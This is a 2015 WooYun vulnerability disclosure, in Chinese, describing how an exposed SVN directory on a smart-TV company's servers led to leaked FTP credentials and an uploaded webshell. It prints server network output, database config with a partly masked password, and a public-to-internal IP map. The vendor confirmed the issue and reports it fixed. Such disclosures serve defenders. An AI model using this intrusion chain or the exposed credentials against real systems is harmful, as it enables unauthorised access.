当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096900

漏洞标题:酷开网络由于一次SVN泄露导致的GETSHELL(可内网渗透)

相关厂商:深圳市酷开网络科技有限公司

漏洞作者: er0tic

提交时间:2015-02-12 09:08

修复时间:2015-02-28 17:03

公开时间:2015-02-28 17:03

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-12: 细节已通知厂商并且等待厂商处理中
2015-02-12: 厂商已经确认,细节仅向厂商公开
2015-02-22: 细节向核心白帽子及相关领域专家公开
2015-02-28: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

由于上次的SVN泄露 然后翻文件的时候进行了进一步的检测。

详细说明:

由于上次的SVN泄露 然后翻文件的时候进行了进一步的检测。
http://wooyun.org/bugs/wooyun-2015-096890
当我直接用IP访问的时候发现进入了另个WEB目录下 试了试同样存在SVN的泄露问题

1.jpg


整站下载 翻了翻源码发现了FTP账号。

2.jpg


果断连接FTP 扔个SHELL上去 但是发现貌似服务器上装了安全防护 访问SHELL就被拉入黑名单
然后传了个加密的就搞定了

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3E:0E:0E:5E
          inet addr:10.200.240.207  Bcast:10.200.247.255  
Mask:255.255.248.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:51790160392 errors:0 dropped:0 overruns:0 frame:0
          TX packets:43523430171 errors:0 dropped:0 overruns:0 
carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9423741499158 (8.5 TiB)  TX bytes:4406883449774 
(4.0 TiB)
          Interrupt:19
eth1      Link encap:Ethernet  HWaddr 00:16:3E:0E:0E:9D
          inet addr:42.121.104.85  Bcast:42.121.107.255  
Mask:255.255.252.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6857288612 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2632907083 errors:0 dropped:0 overruns:0 
carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:860026620346 (800.9 GiB)  TX bytes:5608579939760 
(5.1 TiB)
          Interrupt:20
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:169135098844 errors:0 dropped:0 overruns:0 
frame:0
          TX packets:169135098844 errors:0 dropped:0 overruns:0 
carrier:0
          collisions:0 txqueuelen:0
          RX bytes:59052893992764 (53.7 TiB)  TX bytes:59052893992764 
(53.7 TiB)


define.php
<?php
require_once '../webservices/settings.php';
define("SRTLocalDBUser", "cloudtv");
//define("SRTLocalDBPassword", "abc.123");
define("SRTLocalDBPassword", "cl*****#");
define("SRTAITVDBHOST","10.200.240.208");
//Exception


然后找到了个这个文件 

dbhost.config.php
<?php
return array(
		"42.121.104.89"=>"10.135.9.151",
		"42.121.104.90"=>"10.135.9.151",
		"42.121.104.92"=>"10.135.9.150",
		"42.121.104.93"=>"10.135.9.150",
		"42.121.104.94"=>"10.135.9.149",
		"42.121.104.95"=>"10.135.9.149",
		"42.121.104.96"=>"10.135.9.240",
		"42.121.119.9"=>"10.135.9.240",
		"42.121.119.92"=>"10.135.9.147",
//		"42.121.119.94"=>"10.135.9.147",
//		"42.121.113.124"=>"10.132.58.84",
		"42.121.113.125"=>"10.132.58.84",
//		"42.121.113.128"=>"10.132.58.88",
//		"42.121.113.13"=>"10.132.58.85",
		"42.121.59.208"=>"10.132.58.86",
		"42.121.59.209"=>"10.132.58.86",
		"42.121.59.211"=>"10.132.58.85",
		"42.121.59.212"=>"10.132.58.88",
//		"42.121.59.213"=>"10.200.240.22",
//		"42.121.59.215"=>"10.200.240.22",
		"42.121.59.216"=>"10.200.240.224",//"10.200.240.209",
		"42.121.59.217"=>"10.200.240.209",
		"42.121.59.218"=>"10.200.240.219",
		"42.121.59.214"=>"10.200.25.168",//ep
		"42.121.104.91"=>"10.200.25.168",//ep
		"42.121.119.90"=>"10.200.25.168",//ep
		"42.121.119.91"=>"10.200.25.168",//ep
);
// return array(
// 		"42.121.104.89"=>"10.132.58.9",
// 		"42.121.104.90"=>"10.132.58.9",
// 		"42.121.104.92"=>"10.132.58.87",
// 		"42.121.104.94"=>"10.132.58.87"
// );


这是外网IP对应内网IP的节奏?
然后试了几个 一样存在SVN泄露,这是作死的节奏。
请自行删除SHELL 在APK 和RS目录里

漏洞证明:

由于上次的SVN泄露 然后翻文件的时候进行了进一步的检测。
http://wooyun.org/bugs/wooyun-2015-096890
当我直接用IP访问的时候发现进入了另个WEB目录下 试了试同样存在SVN的泄露问题

1.jpg


整站下载 翻了翻源码发现了FTP账号。

2.jpg


果断连接FTP 扔个SHELL上去 但是发现貌似服务器上装了安全防护 访问SHELL就被拉入黑名单
然后传了个加密的就搞定了

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3E:0E:0E:5E
          inet addr:10.200.240.207  Bcast:10.200.247.255  
Mask:255.255.248.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:51790160392 errors:0 dropped:0 overruns:0 frame:0
          TX packets:43523430171 errors:0 dropped:0 overruns:0 
carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9423741499158 (8.5 TiB)  TX bytes:4406883449774 
(4.0 TiB)
          Interrupt:19
eth1      Link encap:Ethernet  HWaddr 00:16:3E:0E:0E:9D
          inet addr:42.121.104.85  Bcast:42.121.107.255  
Mask:255.255.252.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6857288612 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2632907083 errors:0 dropped:0 overruns:0 
carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:860026620346 (800.9 GiB)  TX bytes:5608579939760 
(5.1 TiB)
          Interrupt:20
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:169135098844 errors:0 dropped:0 overruns:0 
frame:0
          TX packets:169135098844 errors:0 dropped:0 overruns:0 
carrier:0
          collisions:0 txqueuelen:0
          RX bytes:59052893992764 (53.7 TiB)  TX bytes:59052893992764 
(53.7 TiB)


define.php
<?php
require_once '../webservices/settings.php';
define("SRTLocalDBUser", "cloudtv");
//define("SRTLocalDBPassword", "abc.123");
define("SRTLocalDBPassword", "cl*****#");
define("SRTAITVDBHOST","10.200.240.208");
//Exception


然后找到了个这个文件 

dbhost.config.php
<?php
return array(
		"42.121.104.89"=>"10.135.9.151",
		"42.121.104.90"=>"10.135.9.151",
		"42.121.104.92"=>"10.135.9.150",
		"42.121.104.93"=>"10.135.9.150",
		"42.121.104.94"=>"10.135.9.149",
		"42.121.104.95"=>"10.135.9.149",
		"42.121.104.96"=>"10.135.9.240",
		"42.121.119.9"=>"10.135.9.240",
		"42.121.119.92"=>"10.135.9.147",
//		"42.121.119.94"=>"10.135.9.147",
//		"42.121.113.124"=>"10.132.58.84",
		"42.121.113.125"=>"10.132.58.84",
//		"42.121.113.128"=>"10.132.58.88",
//		"42.121.113.13"=>"10.132.58.85",
		"42.121.59.208"=>"10.132.58.86",
		"42.121.59.209"=>"10.132.58.86",
		"42.121.59.211"=>"10.132.58.85",
		"42.121.59.212"=>"10.132.58.88",
//		"42.121.59.213"=>"10.200.240.22",
//		"42.121.59.215"=>"10.200.240.22",
		"42.121.59.216"=>"10.200.240.224",//"10.200.240.209",
		"42.121.59.217"=>"10.200.240.209",
		"42.121.59.218"=>"10.200.240.219",
		"42.121.59.214"=>"10.200.25.168",//ep
		"42.121.104.91"=>"10.200.25.168",//ep
		"42.121.119.90"=>"10.200.25.168",//ep
		"42.121.119.91"=>"10.200.25.168",//ep
);
// return array(
// 		"42.121.104.89"=>"10.132.58.9",
// 		"42.121.104.90"=>"10.132.58.9",
// 		"42.121.104.92"=>"10.132.58.87",
// 		"42.121.104.94"=>"10.132.58.87"
// );


这是外网IP对应内网IP的节奏?
然后试了几个 一样存在SVN泄露,这是作死的节奏。
请自行删除SHELL 在APK 和RS目录里

修复方案:

好好加班吧。

版权声明:转载请注明来源 er0tic@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-12 10:07

厂商回复:

已验证,并联系相关人员进行修复

最新状态:

2015-02-28:已完成修复:重新调整相关环境,关闭外网权限,删除和修改相关账户信息